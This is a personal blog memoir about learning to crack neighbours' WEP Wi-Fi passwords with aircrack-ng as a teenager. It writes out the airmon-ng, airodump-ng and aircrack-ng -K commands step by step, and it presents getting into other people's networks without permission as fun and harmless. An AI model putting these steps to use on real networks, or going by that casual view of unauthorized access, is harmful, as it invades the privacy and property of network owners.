Let me take you back to 2007-2008 in the warm tropical city of Caracas in Venezuela. As with many other cities around the globe, the emerging internet was spreading everywhere like an invisible tapestry. Businesses, residences, restaurants, and many other places started popping up in the 2.5Ghz spectrum. Of course, most of these networks were blocked, and the gatekeeper at the time was the WEP security protocol. WEP stands for "Wired Equivalent Privacy" and the whole point of said protocol was to protect unauthorized access to wireless networks.
Back then I wasn't really into security. In fact, I was certain my destiny was to become a famous Videogame developer. I had started to mess around with game programming and had already realized how much work making games really was. At the same time, my dad had started to dabble with Linux, and it had started to peak my interest. I remember setting up Linux on my laptop, back in the day when you had to hack your way around installing graphic and wireless network drivers. It was a huge pain in the butt, but the sense of accomplishment and freedom when you finally got it to run was fantastic. Besides it was baffling to me that machines could run other Operating Systems that where not either macOS or Windows!
My dad started collecting "Linux Magazines", and that is how one day I stumbled upon one that talked about this new tool call "aircrack-ng". I remember opening it up and reading the article in awe. It talked about a tool that could easily break WEP encryption and eventually retrieve the password for wireless networks using said protocol. There was a moment of true excitement as I realized what this meant: "Free. Internet. Everywhere!"
I immediately ran to my computer booted up Ubuntu and spent the next couple of hours setting everything up to download aircrack. I distinctly remember struggling to get the internal wireless card of my computer to work properly. Finally, I typed the first command on the console.
airmon-ng start wlan0
Boom! No errors! Yes! The wireless card turned on into monitor mode. According to the magazine this first step meant my wireless card was know able to read packets that weren't intended for it. At the time I didn't quite understand what that meant, but I was just gonna go along with it. I quickly read the next step
airodump-ng mon0
Suddenly a wall of text showed up infront of me. Holy crap! These were all the wireless networks nearby. I could see our wireless network there, but I already knew the password for that. No fun in hacking that. Besides, our internet wasn't as fast as I'd like at the time....but, I had overheard the kids living on the floor below once brag about their 1MB internet access. Now THAT was an interesting challenge.
I quickly found their wireless network cause it had the name of one of the kids (I forgot what he was called so let's just call him Alberto). I quickly gazed over the magazine and found the next steps.
airodump-ng -c 11 --essid Alberto -w output--ivs mon0
Airodump started doing it's thing, whatever it's thing was. I glanced back at the magazine and read that airodump was now capturing all the packets from the wireless network. It said I needed a ton of IVs to break it. I skipped ahead a bit, it didn't quite explain what IVs were, but a quick google search mentioned something about Initialization Vectors. That didn't help much, but I guess it wasn't super important for me to know at the time.
Next step was optional, it said that if I didn't see much traffic I could induce more by using aireplay. I looked up the edge of the magazine and saw the numbers on my screen soaring. That network had plenty of traffic; kid was probably torrenting or something.
I waited a bit more staring at the numbers and re-reading the instructions, mentally checking I hadn't messed up any previous commands. You see if this worked....my god if this worked.... I would have internet wherever I went. I could now connect in places such as my grandmother's houses, school, or the beach, would all suddenly be connected to the internet. I know it may seem a bit ridiculous reading this. Most of us now have access to the Internet wherever we go, but you gotta understand that, at the time, I barely had access to any WiFi outside of my own home. Furthermore, my internet access was really slow. And lastly, this felt like a badass thing to do.
After waiting for what seemed like an eternity I ran the final command:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
The screen flashed with numbers, and symbols. I had no idea what was happening behind the scenes, but I felt like a grade-A certified hacker. I crossed my fingers in anticipation. Then the screen stopped and a message popped:
Not Enough IVs!
God-- I knew it! I knew it was too good to be true! What happened? I looked at the error and then back at the book. I retraced all the steps. Do I have to re-do this? I pondered for a second looking at random steps. However there was a final paragraph on the magazine that talked about using -K
alternatively. What did that mean? I popped into the command line again
aircrack-ng -h
A "helpful" list of parameters popped on the screen. Scanning the screen I found the -K
. Apparently this "invoked the FMS/Korek" method. Huh... weird, but whatever let's try that out.
aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap
This time the numbers flashed back on the screen and my anticipation grew. Part of me was still excited, another part of me was telling me I was getting an error again. Suddenly the screen flashed again:
KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
YEEEESSSSS! THANK YOU GOD!
I was ecstatic, my hands flew over the keyboard as looked up a HEX to ASCII table. I quickly translated the password into readable human text. I don't remember the password now, but I remember it being silly.
I quickly restarted the machine and clicked on wireless settings, selected Alberto, and plugged in the password.
Connection Successful!
I quickly open the browser and saw google load.
Holy Sh--....
I stayed static for a second in disbelief. Did I just do that?
I did a speed-test and almost shed a tear when I saw that 1MB speed these guys had. I ran out of the room yelling for my Dad. I told him what I'd done and he was extremely curious. He ran up to my computer and saw the connection.
Holy Cow! How'd you do this? We spent the next hours playing with aircrack, breaking every single wireless network nearby.
The next year or so was glorious, I had Internet everywhere I went, and the excitement of breaking these networks had motivated me to understand cryptography and wireless security better. I started reading up on the RC4 ciphers, IVs, and what exactly was happening behind the scenes with aircrack and WEP. I even wrote my IB Thesis on "Breaking WEP".
Not soon after, routers started deprecating WEP and the more "un-hackable" WPA/WPA2 showed up. Although, this meant I could no longer break into these network, things balanced out because Internet access became a bit more affordable and a lot of places such as pizzerias and cafés started to provide free hotspots.
I'd argue this was probably one of the first events that tilted my path towards computer security. At the very least, it made me realize that computers, networks, and other devices we trusted so much, were actually a lot more flawed than I imagined. And that if you where smart enough and knew where to look, you could do all sorts of mischievous things.... 😉
Recordando esos dias de descubrimientos..